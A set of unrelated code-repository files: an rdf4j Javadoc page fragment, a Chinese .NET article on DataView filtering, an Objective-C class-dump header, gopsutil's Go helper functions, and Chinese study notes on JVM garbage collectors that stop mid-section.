href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#notify--" title="class or interface in java.lang">notify</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#notifyAll--" title="class or interface in java.lang">notifyAll</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#wait--" title="class or interface in java.lang">wait</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#wait-long-" title="class or interface in java.lang">wait</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#wait-long-int-" title="class or interface in java.lang">wait</a></code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ========= CONSTRUCTOR DETAIL ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="LogReaderAction--"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>LogReaderAction</h4> <pre>public&nbsp;LogReaderAction()</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method.detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="begin-ch.qos.logback.core.joran.spi.InterpretationContext-java.lang.String-org.xml.sax.Attributes-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>begin</h4> <pre>public&nbsp;void&nbsp;begin(ch.qos.logback.core.joran.spi.InterpretationContext&nbsp;ec, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;name, <a href="http://download.oracle.com/javase/7/docs/api/org/xml/sax/Attributes.html?is-external=true" title="class or interface in org.xml.sax">Attributes</a>&nbsp;attributes)</pre> <dl> <dt><span class="overrideSpecifyLabel">Specified by:</span></dt> <dd><code>begin</code>&nbsp;in class&nbsp;<code>ch.qos.logback.core.joran.action.Action</code></dd> </dl> </li> </ul> <a name="end-ch.qos.logback.core.joran.spi.InterpretationContext-java.lang.String-"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>end</h4> <pre>public&nbsp;void&nbsp;end(ch.qos.logback.core.joran.spi.InterpretationContext&nbsp;ec, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;arg1)</pre> <dl> <dt><span class="overrideSpecifyLabel">Specified by:</span></dt> <dd><code>end</code>&nbsp;in class&nbsp;<code>ch.qos.logback.core.joran.action.Action</code></dd> </dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/LogConfigurator.LogReaderAction.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../../../org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.html" title="class in org.eclipse.rdf4j.common.app.logging.logback"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li>Next&nbsp;Class</li> </ul> <ul class="navList"> <li><a href="../../../../../../../index.html?org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.LogReaderAction.html" target="_top">Frames</a></li> <li><a href="LogConfigurator.LogReaderAction.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#fields.inherited.from.class.ch.qos.logback.core.joran.action.Action">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2015-2019 <a href="https://www.eclipse.org/">Eclipse Foundation</a>. All Rights Reserved.</small></p> </body> </html>
{ "pile_set_name": "Github" }
--- title: 使用 DataView 进行筛选 (LINQ to DataSet) ms.date: 03/30/2017 dev_langs: - csharp - vb ms.assetid: 5632d74a-ff53-4ea7-9fe7-4a148eeb1c68 ms.openlocfilehash: 9b4c8e9730dde7d19df9e6a11052ae4591465ea7 ms.sourcegitcommit: 5b475c1855b32cf78d2d1bbb4295e4c236f39464 ms.translationtype: MT ms.contentlocale: zh-CN ms.lasthandoff: 09/24/2020 ms.locfileid: "91177457" --- # <a name="filtering-with-dataview-linq-to-dataset"></a>使用 DataView 进行筛选 (LINQ to DataSet) 使用特定条件筛选数据,然后通过 UI 控件在客户端中表示该数据的能力是数据绑定的一个重要特征。 <xref:System.Data.DataView> 提供多种方式来筛选数据并返回满足指定筛选条件的数据行子集。 除了基于字符串的筛选功能以外, <xref:System.Data.DataView> 还提供了对筛选条件使用 LINQ 表达式的功能。 LINQ 表达式允许执行比基于字符串的筛选更复杂而功能更强大的筛选操作。 使用 <xref:System.Data.DataView> 筛选数据有两种方式: - <xref:System.Data.DataView>使用 Where 子句从 LINQ to DataSet 查询创建。 - 使用 <xref:System.Data.DataView> 现有的基于字符串的筛选功能。 ## <a name="creating-dataview-from-a-query-with-filtering-information"></a>通过具有筛选信息的查询创建 DataView <xref:System.Data.DataView>可以通过 LINQ to DataSet 查询来创建对象。 如果该查询包含一个 `Where` 子句,则会使用查询中的筛选信息创建 <xref:System.Data.DataView>。 `Where` 子句中的表达式用于确定哪些数据行将包括在 <xref:System.Data.DataView> 中并作为筛选器的基础。 基于表达式的筛选器具有比基于字符串的简单筛选器更强大、更复杂的筛选功能。 基于字符串的筛选器和基于表达式的筛选器是互相排斥的。 如果在通过查询创建 <xref:System.Data.DataView.RowFilter%2A> 后设置基于字符串的 <xref:System.Data.DataView>,则会清除从查询推断的基于表达式的筛选器。 > [!NOTE] > 在大多数情况下,用于筛选的表达式不应有副作用且必须是确定的。 另外,表达式不应包含依赖于固定执行次数的任何逻辑,因为筛选操作可能会执行任意次。 ### <a name="example"></a>示例 下面的示例查询 SalesOrderDetail 表中数量大于 2 且小于 6 的订单,通过查询创建 <xref:System.Data.DataView>,并将 <xref:System.Data.DataView> 绑定到 <xref:System.Windows.Forms.BindingSource>: [!code-csharp[DP DataView Samples#LDVFromQueryWhere](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvfromquerywhere)] [!code-vb[DP DataView Samples#LDVFromQueryWhere](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvfromquerywhere)] ### <a name="example"></a>示例 下面的示例通过查询 2001 年 6 月 6 日以后达成的订单来创建 <xref:System.Data.DataView>: [!code-csharp[DP DataView Samples#LDVFromQueryWhere3](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvfromquerywhere3)] [!code-vb[DP DataView Samples#LDVFromQueryWhere3](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvfromquerywhere3)] ### <a name="example"></a>示例 筛选也可以与排序组合使用。 下面的示例通过查询姓氏以“S”开始并按姓氏排序,然后按名字排序的联系人来创建 <xref:System.Data.DataView>: [!code-csharp[DP DataView Samples#LDVFromQueryWhereOrderByThenBy](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvfromquerywhereorderbythenby)] [!code-vb[DP DataView Samples#LDVFromQueryWhereOrderByThenBy](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvfromquerywhereorderbythenby)] ### <a name="example"></a>示例 下面的示例使用 SoundEx 算法查找姓氏与“Zhu”相近的联系人。 SoundEx 算法在 SoundEx 方法中实现。 [!code-csharp[DP DataView Samples#LDVSoundExFilter](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvsoundexfilter)] [!code-vb[DP DataView Samples#LDVSoundExFilter](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvsoundexfilter)] SoundEx 是一种拼音算法,用于按英语发音来索引姓名,它最初由美国人口调查局开发。 SoundEx 方法返回一个表示姓名的四字符代码,由一个英文字母后跟三个数字构成。 字母是姓名的首字母,数字对姓名中剩余的辅音字母编码。 发音相近的姓名具有相同的 SoundEx 代码。 上一示例的 SoundEx 方法中使用的 SoundEx 实现如下所示: [!code-csharp[DP DataView Samples#SoundEx](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#soundex)] [!code-vb[DP DataView Samples#SoundEx](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#soundex)] ## <a name="using-the-rowfilter-property"></a>使用 RowFilter 属性 现有的基于字符串的筛选功能 <xref:System.Data.DataView> 仍适用于 LINQ to DataSet 上下文。 有关基于字符串的筛选的详细信息 <xref:System.Data.DataView.RowFilter%2A> ,请参阅对 [数据进行排序和筛选](./dataset-datatable-dataview/sorting-and-filtering-data.md)。 下面的示例从 Contact 表创建 <xref:System.Data.DataView>,然后设置 <xref:System.Data.DataView.RowFilter%2A> 属性以返回联系人的姓氏为“Zhu”的行: [!code-csharp[DP DataView Samples#LDVRowFilter](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvrowfilter)] [!code-vb[DP DataView Samples#LDVRowFilter](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvrowfilter)] 在 <xref:System.Data.DataView> 从 <xref:System.Data.DataTable> 或 LINQ to DataSet 查询创建后,可以使用 <xref:System.Data.DataView.RowFilter%2A> 属性根据行的列值指定行的子集。 基于字符串的筛选器和基于表达式的筛选器是互相排斥的。 设置 <xref:System.Data.DataView.RowFilter%2A> 属性将清除从 LINQ to DataSet 查询推断的筛选表达式,并且不能重置筛选器表达式。 [!code-csharp[DP DataView Samples#LDVFromQueryWhereSetRowFilter](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvfromquerywheresetrowfilter)] [!code-vb[DP DataView Samples#LDVFromQueryWhereSetRowFilter](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvfromquerywheresetrowfilter)] 如果要返回特定数据查询的结果而不是提供数据子集的动态视图,则可以使用 <xref:System.Data.DataView.Find%2A> 的 <xref:System.Data.DataView.FindRows%2A> 或 <xref:System.Data.DataView> 方法,而不设置 <xref:System.Data.DataView.RowFilter%2A> 属性。 <xref:System.Data.DataView.RowFilter%2A> 属性最适合用于用绑定控件显示筛选结果的数据绑定应用程序。 设置 <xref:System.Data.DataView.RowFilter%2A> 属性会重新生成数据的索引,从而增加应用程序的系统开销并降低性能。 <xref:System.Data.DataView.Find%2A> 和 <xref:System.Data.DataView.FindRows%2A> 方法使用当前索引,而不要求重新生成索引。 如果只想调用 <xref:System.Data.DataView.Find%2A> 或 <xref:System.Data.DataView.FindRows%2A> 一次,则应使用现有的 <xref:System.Data.DataView>。 如果想要调用 <xref:System.Data.DataView.Find%2A> 或 <xref:System.Data.DataView.FindRows%2A> 多次,则应该创建一个新的 <xref:System.Data.DataView> 以便对想要搜索的列重新生成索引,然后调用 <xref:System.Data.DataView.Find%2A> 或 <xref:System.Data.DataView.FindRows%2A> 方法。 有关和方法的详细信息 <xref:System.Data.DataView.Find%2A> , <xref:System.Data.DataView.FindRows%2A> 请参阅 [查找行](./dataset-datatable-dataview/finding-rows.md) 和 [DataView 性能](dataview-performance.md)。 ## <a name="clearing-the-filter"></a>清除筛选器 使用 <xref:System.Data.DataView> 属性设置筛选之后,可以清除 <xref:System.Data.DataView.RowFilter%2A> 上的筛选器。 <xref:System.Data.DataView> 上的筛选器可以采用两种不同的方式清除: - 将 <xref:System.Data.DataView.RowFilter%2A> 属性设置为 `null`。 - 将 <xref:System.Data.DataView.RowFilter%2A> 属性设置为一个空字符串。 ### <a name="example"></a>示例 下面的示例通过查询创建 <xref:System.Data.DataView>,然后通过将 <xref:System.Data.DataView.RowFilter%2A> 属性设置为 `null` 来清除该筛选器: [!code-csharp[DP DataView Samples#LDVClearRowFilter2](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvclearrowfilter2)] [!code-vb[DP DataView Samples#LDVClearRowFilter2](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvclearrowfilter2)] ### <a name="example"></a>示例 下面的示例从表创建 <xref:System.Data.DataView>,设置 <xref:System.Data.DataView.RowFilter%2A> 属性,然后通过将 <xref:System.Data.DataView.RowFilter%2A> 属性设置为一个空的字符串来清除该筛选器: [!code-csharp[DP DataView Samples#LDVClearRowFilter](../../../../samples/snippets/csharp/VS_Snippets_ADO.NET/DP DataView Samples/CS/Form1.cs#ldvclearrowfilter)] [!code-vb[DP DataView Samples#LDVClearRowFilter](../../../../samples/snippets/visualbasic/VS_Snippets_ADO.NET/DP DataView Samples/VB/Form1.vb#ldvclearrowfilter)] ## <a name="see-also"></a>请参阅 - [数据绑定和 LINQ to DataSet](data-binding-and-linq-to-dataset.md) - [使用 DataView 进行排序](sorting-with-dataview-linq-to-dataset.md)
{ "pile_set_name": "Github" }
// // Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21). // // class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard. // #import <Foundation/NSObject.h> @class NSDictionary; @interface iCloudAOSDelegate : NSObject { BOOL _succeeded; NSDictionary *_userInfo; NSDictionary *_delegatesResponseDict; BOOL _needsRepair; BOOL _needsOptionalTOS; CDUnknownBlockType _notificationReceivedBlock; } @property(copy) CDUnknownBlockType notificationReceivedBlock; // @synthesize notificationReceivedBlock=_notificationReceivedBlock; @property(readonly) BOOL needsRepair; // @synthesize needsRepair=_needsRepair; @property(readonly) BOOL needsOptionalTOS; // @synthesize needsOptionalTOS=_needsOptionalTOS; @property(readonly) NSDictionary *delegatesResponseDict; // @synthesize delegatesResponseDict=_delegatesResponseDict; @property(readonly) BOOL succeeded; // @synthesize succeeded=_succeeded; - (void).cxx_destruct; - (void)_stopObservingAOSNotificationsForOperation:(id)arg1; - (void)_startObservingAOSNotificationsForOperation:(id)arg1 withCompletionBlock:(CDUnknownBlockType)arg2; - (void)_processAuthenticateResponse; - (void)_refreshFailed:(id)arg1; - (void)_refreshCompleted:(id)arg1; - (void)_validateNotOK:(id)arg1; - (void)_validateOK:(id)arg1; - (BOOL)logout:(id)arg1; - (BOOL)completeSetupWithUsername:(id)arg1 password:(id)arg2 performAuthKitReauth:(BOOL)arg3 authResults:(id)arg4 delegateDictionary:(id)arg5 mobileMeDictionary:(id)arg6 selectedServices:(id)arg7 updatedAuthResults:(id *)arg8; - (BOOL)getCommerceDelegateResponseForUsername:(id)arg1 andPassword:(id)arg2 authResults:(id)arg3 additionalDelegates:(id)arg4 error:(id *)arg5; - (BOOL)validateiCloudUsername:(id)arg1 andPassword:(id)arg2 authResults:(id)arg3 additionalRequestAttributes:(id)arg4 delegates:(id)arg5 error:(id *)arg6; - (BOOL)validateiCloudUsername:(id)arg1 andPassword:(id)arg2 authResults:(id)arg3 additionalRequestAttributes:(id)arg4 error:(id *)arg5; - (BOOL)shouldUserGetOptionalTOS:(id)arg1; @end
{ "pile_set_name": "Github" }
package common // // gopsutil is a port of psutil(http://pythonhosted.org/psutil/). // This covers these architectures. // - linux (amd64, arm) // - freebsd (amd64) // - windows (amd64) import ( "bufio" "bytes" "context" "errors" "fmt" "io/ioutil" "net/url" "os" "os/exec" "path" "path/filepath" "reflect" "runtime" "strconv" "strings" "time" ) var ( Timeout = 3 * time.Second ErrTimeout = errors.New("command timed out") ) type Invoker interface { Command(string, ...string) ([]byte, error) CommandWithContext(context.Context, string, ...string) ([]byte, error) } type Invoke struct{} func (i Invoke) Command(name string, arg ...string) ([]byte, error) { ctx, cancel := context.WithTimeout(context.Background(), Timeout) defer cancel() return i.CommandWithContext(ctx, name, arg...) } func (i Invoke) CommandWithContext(ctx context.Context, name string, arg ...string) ([]byte, error) { cmd := exec.CommandContext(ctx, name, arg...) var buf bytes.Buffer cmd.Stdout = &buf cmd.Stderr = &buf if err := cmd.Start(); err != nil { return buf.Bytes(), err } if err := cmd.Wait(); err != nil { return buf.Bytes(), err } return buf.Bytes(), nil } type FakeInvoke struct { Suffix string // Suffix species expected file name suffix such as "fail" Error error // If Error specfied, return the error. } // Command in FakeInvoke returns from expected file if exists. func (i FakeInvoke) Command(name string, arg ...string) ([]byte, error) { if i.Error != nil { return []byte{}, i.Error } arch := runtime.GOOS commandName := filepath.Base(name) fname := strings.Join(append([]string{commandName}, arg...), "") fname = url.QueryEscape(fname) fpath := path.Join("testdata", arch, fname) if i.Suffix != "" { fpath += "_" + i.Suffix } if PathExists(fpath) { return ioutil.ReadFile(fpath) } return []byte{}, fmt.Errorf("could not find testdata: %s", fpath) } func (i FakeInvoke) CommandWithContext(ctx context.Context, name string, arg ...string) ([]byte, error) { return i.Command(name, arg...) } var ErrNotImplementedError = errors.New("not implemented yet") // ReadLines reads contents from a file and splits them by new lines. // A convenience wrapper to ReadLinesOffsetN(filename, 0, -1). func ReadLines(filename string) ([]string, error) { return ReadLinesOffsetN(filename, 0, -1) } // ReadLines reads contents from file and splits them by new line. // The offset tells at which line number to start. // The count determines the number of lines to read (starting from offset): // n >= 0: at most n lines // n < 0: whole file func ReadLinesOffsetN(filename string, offset uint, n int) ([]string, error) { f, err := os.Open(filename) if err != nil { return []string{""}, err } defer f.Close() var ret []string r := bufio.NewReader(f) for i := 0; i < n+int(offset) || n < 0; i++ { line, err := r.ReadString('\n') if err != nil { break } if i < int(offset) { continue } ret = append(ret, strings.Trim(line, "\n")) } return ret, nil } func IntToString(orig []int8) string { ret := make([]byte, len(orig)) size := -1 for i, o := range orig { if o == 0 { size = i break } ret[i] = byte(o) } if size == -1 { size = len(orig) } return string(ret[0:size]) } func UintToString(orig []uint8) string { ret := make([]byte, len(orig)) size := -1 for i, o := range orig { if o == 0 { size = i break } ret[i] = byte(o) } if size == -1 { size = len(orig) } return string(ret[0:size]) } func ByteToString(orig []byte) string { n := -1 l := -1 for i, b := range orig { // skip left side null if l == -1 && b == 0 { continue } if l == -1 { l = i } if b == 0 { break } n = i + 1 } if n == -1 { return string(orig) } return string(orig[l:n]) } // ReadInts reads contents from single line file and returns them as []int32. func ReadInts(filename string) ([]int64, error) { f, err := os.Open(filename) if err != nil { return []int64{}, err } defer f.Close() var ret []int64 r := bufio.NewReader(f) // The int files that this is concerned with should only be one liners. line, err := r.ReadString('\n') if err != nil { return []int64{}, err } i, err := strconv.ParseInt(strings.Trim(line, "\n"), 10, 32) if err != nil { return []int64{}, err } ret = append(ret, i) return ret, nil } // Parse Hex to uint32 without error func HexToUint32(hex string) uint32 { vv, _ := strconv.ParseUint(hex, 16, 32) return uint32(vv) } // Parse to int32 without error func mustParseInt32(val string) int32 { vv, _ := strconv.ParseInt(val, 10, 32) return int32(vv) } // Parse to uint64 without error func mustParseUint64(val string) uint64 { vv, _ := strconv.ParseInt(val, 10, 64) return uint64(vv) } // Parse to Float64 without error func mustParseFloat64(val string) float64 { vv, _ := strconv.ParseFloat(val, 64) return vv } // StringsHas checks the target string slice contains src or not func StringsHas(target []string, src string) bool { for _, t := range target { if strings.TrimSpace(t) == src { return true } } return false } // StringsContains checks the src in any string of the target string slice func StringsContains(target []string, src string) bool { for _, t := range target { if strings.Contains(t, src) { return true } } return false } // IntContains checks the src in any int of the target int slice. func IntContains(target []int, src int) bool { for _, t := range target { if src == t { return true } } return false } // get struct attributes. // This method is used only for debugging platform dependent code. func attributes(m interface{}) map[string]reflect.Type { typ := reflect.TypeOf(m) if typ.Kind() == reflect.Ptr { typ = typ.Elem() } attrs := make(map[string]reflect.Type) if typ.Kind() != reflect.Struct { return nil } for i := 0; i < typ.NumField(); i++ { p := typ.Field(i) if !p.Anonymous { attrs[p.Name] = p.Type } } return attrs } func PathExists(filename string) bool { if _, err := os.Stat(filename); err == nil { return true } return false } //GetEnv retrieves the environment variable key. If it does not exist it returns the default. func GetEnv(key string, dfault string, combineWith ...string) string { value := os.Getenv(key) if value == "" { value = dfault } switch len(combineWith) { case 0: return value case 1: return filepath.Join(value, combineWith[0]) default: all := make([]string, len(combineWith)+1) all[0] = value copy(all[1:], combineWith) return filepath.Join(all...) } panic("invalid switch case") } func HostProc(combineWith ...string) string { return GetEnv("HOST_PROC", "/proc", combineWith...) } func HostSys(combineWith ...string) string { return GetEnv("HOST_SYS", "/sys", combineWith...) } func HostEtc(combineWith ...string) string { return GetEnv("HOST_ETC", "/etc", combineWith...) } func HostVar(combineWith ...string) string { return GetEnv("HOST_VAR", "/var", combineWith...) } func HostRun(combineWith ...string) string { return GetEnv("HOST_RUN", "/run", combineWith...) } // getSysctrlEnv sets LC_ALL=C in a list of env vars for use when running // sysctl commands (see DoSysctrl). func getSysctrlEnv(env []string) []string { foundLC := false for i, line := range env { if strings.HasPrefix(line, "LC_ALL") { env[i] = "LC_ALL=C" foundLC = true } } if !foundLC { env = append(env, "LC_ALL=C") } return env }
{ "pile_set_name": "Github" }
------------------------ Gc收集器 | ------------------------ # 收集算法是内存回收的方法论, 收集器则是实现了 # jvm规范对收集器怎么去实现, 没有任何规定, 所以不同厂家, 不同版本的可能不一样 # GC收集器目前主要的有 * 新生代收集器 Serial ParNew Parallel Scavenge * 老年代收集器 Concurrent Mark Sweep(CMS) Parallel Old Serial Old(MSC) * 全堆收集器 Garbage First(G1) * 不同的收集器可以共存, 组合使用 * 它们之间没有绝对的最完美的收集器,(如果有, 也不用实现那么多出来) ------------------------ Gc收集器关系图 | ------------------------ +-------------------------年轻代回收------------------------------------+ |[Serial] [ParNew] [Parallel Scavenge] | |--------------------------老年代回收-------------------------------[G1]| |[Concurrent Mark Sweep(CMS)] [Serial Old(MSC)] [Parallel Old] | +-----------------------------------------------------------------------+ # 可以组合的GC收集器 [Serial] + Concurrent Mark Sweep(CMS)] [Serial] + [Serial Old(MSC)] [ParNew] + [Concurrent Mark Sweep(CMS)] [ParNew] + [Serial Old(MSC)] [Parallel Scavenge] + [Serial Old(MSC)] [Parallel Scavenge] + [Parallel Old] [Serial Old(MSC)] + [Concurrent Mark Sweep(CMS)] ------------------------ Serial | ------------------------ # 最基本的, 历史最悠久的收集器, 在JDK1.3.1之前是虚拟机新生代的唯一选择 # 这个收集器是一个单线程的收集器 # 它在执行GC的时候, 会暂停所有的工作线程, 直到它收集结束 # 它在Client模式下的虚拟机来说, 是一个很好的选择 * Client模式(桌面环境), 一般分配给jvm管理的内存不是很大 * GC导致的停顿时间, 完全可以控制在几十毫秒 - 100毫秒以内, 这是可以接收的 * 单线程, 免去了多线程的切换, 可以专注的进行收集工作, 效率更高 # 工作模式(采用复制算法) 1. (第一阶段标记)暂停业务线程, 单线程收集(新生代采用复制算法) 2. 唤醒业务线程 3. (第二阶段标记)暂停业务线程, 单线程收集(老年代采用标记整理算法) ------------------------ ParNew | ------------------------ # 它其实就是 Serial 的多线程版本 # 还可以通过一系列的JVM参数对它进行控制 -XX:SurvivorRatio -XX:PretenureSizeThreshold -XX:HandlePromotionFailure # 他的工作流程 1. (第一阶段标记)暂停业务线程, 多线程收集(新生代采用复制算法) 2. 唤醒业务线程 3. (第二阶段标记)暂停业务线程, 单线程收集(老年代采用标记整理算法) # 它相对于 Serial 并没太多的创新之处, 甚至连部分代码都是共用的, 但它却是很多在运行Server模式的JVM的'新生代'首选收集器 * 因为一个与性能无关的原因: 除了 Serial 以外, 只有它能与Concurrent Mark Sweep(CMS)收集器配合工作 # 在单核的CPU环境中, 它的效果不一定比 Serial 好 * 甚至由于多线程交互的开销, 可能不如 Serial * 这个收集器, 在通过超线程技术实现的两个CPU核心环境中, 都不能100%的 保证超越 Serial # 随着CPU核心数量的增加, 它对于GC时系统资源的有效利用还是很有好处的 * 默认开启的收集线程数量与CPU的核心数量相同 * 在核心数量非常多的情况下, 可以通过参数来限制垃圾收集的线程的数量 -XX:ParallelGCThreads=10 # 指定使用ParNew收集器 -XX:+UseConMarkSweepGC * 使用Concurrent Mark Sweep(CMS)作为老年代收集器 * 如果使用该参数, 默认就会使用: ParNew 作为新生代的收集器 -XX:+UseParNewGC * 强制系统使用 ParNew 作为新生代的收集器 ------------------------ Parallel Scavenge | ------------------------ # 新生代收集器, 使用复制算法, 也是可以并行收集的 # 看似与 ParNew 一样, 但是它的目的则是达到一个可控制的吞吐量 吞吐量 = CPU用于业务线程的时间 / (CPU用于业务线程的时间 + CPU用于垃圾收集的时间) * 虚拟机运行了 100分钟, 垃圾回收花费了1 分钟, 则吞吐量就是: 99% * 因为与吞吐量相关,也被称为:吞吐量优先的收集器 # 提供了参数用于精准的控制吞吐量 -XX:MaxGCPauseMillis * 置最大垃圾收集停顿时间, 它的值是一个大于 0 的整数 * 收集器在工作时, 会调整 Java 堆大小或者其他一些参数,尽可能地把停顿时间控制在 MaxGCPauseMillis 以内 * 停顿时间的缩短, 是牺牲了吞吐量(以前10s一次100ms的GC, 现在5s一次70ms的GC)和新生代空间(对体积小的内存收集比较快)换来的, 这也导致GC发生得更加的频繁 * 过小的话, GC停顿时间确实下降了, 但是吞吐量也下降了 -XX:GCTimeRatio * 设置吞吐量大小, 它的值是一个大于 0 小于 100 之间的整数 * 可以理解为: 垃圾收集时间占总时间的比例 * 默认 GCTimeRatio 的值为 99, 那么系统将花费不超过 1 / (1 + 99) = 1% 的时间用于垃圾收集 -XX:+UseAdaptiveSizePolicy * 打开自适应 GC 策略, 在这种模式下, 其他的一些属性不需要自己去设置, 参数会被自动调整, 以达到在堆大小, 吞吐量和停顿时间之间的平衡点 -Xmn(新生代大小) -XX:+SuivivorRatio(Eden和Survivor区的比例) -XX:+PretenureSizeThreshold(晋升老年代对象年龄) * 使用自适应GC策略, 只需要把基本的内存数据设置好,例如堆内存大小值 * 然后仅仅关注/设置最大停顿时间:-XX:MaxGCPauseMillis * 或者给JVM设置一个最大吞吐量 -XX:GCTimeRatio 的优化目标, 具体的工作细节就由jvm完成 ------------------------ Serial Old | ------------------------ # 它是 Serial 收集器的老年代版本, 也是一个单线程的收集器 # 它存在的意义, 也是给 Client 模式的JVM使用 # 如果在Server模式下使用, 它有两个用途 * 在JDK1.5之前与 Parallel Scavenge 搭配使用 * 作为 Concurrent Mark Sweep(CMS) 收集器的后备预案, 在并发收集发生 Concurrent Mode Failure 时使用 * 出现此现象的原因主要有两个:一个是在年老代被用完之前不能完成对无引用对象的回收 , 一个是当新空间分配请求在年老代的剩余空间中得到满足 # Serial 配合 Serial Old工作模式 1. (第一阶段标记)暂停业务线程, 单线程收集(新生代采用复制算法) 2. 唤醒业务线程 3. (第二阶段标记)暂停业务线程, 单线程收集(老年代采用标记-整理算法) ------------------------ Parallel Old | ------------------------ # 它其实是 Parallel Scavenge 收集器的老年代版本, 使用标记清理算法, 在JDK1.6以后才提供 # 在此之前, 新生代的Parallel Scavenge收集器存在一个尴尬的问题 * 如果选择了Parallel Scavenge收集器, 那么老年代除了Serial Old收集器外别无选择 * 由于老年代收集器Serial Old在服务端性能上的拖累, 就算使用 Parallel Scavenge 也未必能获得最大的吞吐量效果 * 这种组合的吞吐量, 不一定比使用 ParNew + Serial Old 更好 # Parallel Old 收集器出现后, 就有了和Parallel Scavenge收集器的一个优良组合 * 在注重吞吐量和CPU资源敏感的场合, 都可以优先考虑 Parallel Scavenge + Parallel Old # Parallel Scavenge 配合 Parallel Old 工作原理 1. (第一阶段标记)暂停业务线程, 多线程收集 2. 唤醒业务线程 3. (第二阶段标记)暂停业务线程, 多线程收集 -------------------------- Concurrent Mark Sweep(CMS)| -------------------------- # 以获取最短停顿时间为目标的收集器, 基于标记-清除的算法实现 # 目前很大一部分Java都是应用在B/S环境下的, 尤其重视响应速度, 希望系统停顿时间短, CMS就非常适合 # 它的执行过程稍微要复杂一点 1. 初始标记(Initial Mark) * 停止业务线程 * 标记一下GC Roots能直接关联的对象, 速度很快 2. 并发标记(Concurrent Mark) 3. 重新标记(Remark) * 停止业务线程 * 修正并发标记期间, 因为程序逻辑导致标记产生变动的对象记录 4. 并发清除(Concurrent Sweeo) * 整个过程中, 最耗时的并发标记和并发清除过程不会停止业务线程 # 它是优秀的收集器, 并发收集, 低停顿, 但是也有一些缺点 1, 对CPU资源敏感 * 事实上, 面向并发设计的程序都对CPU资源敏感 * 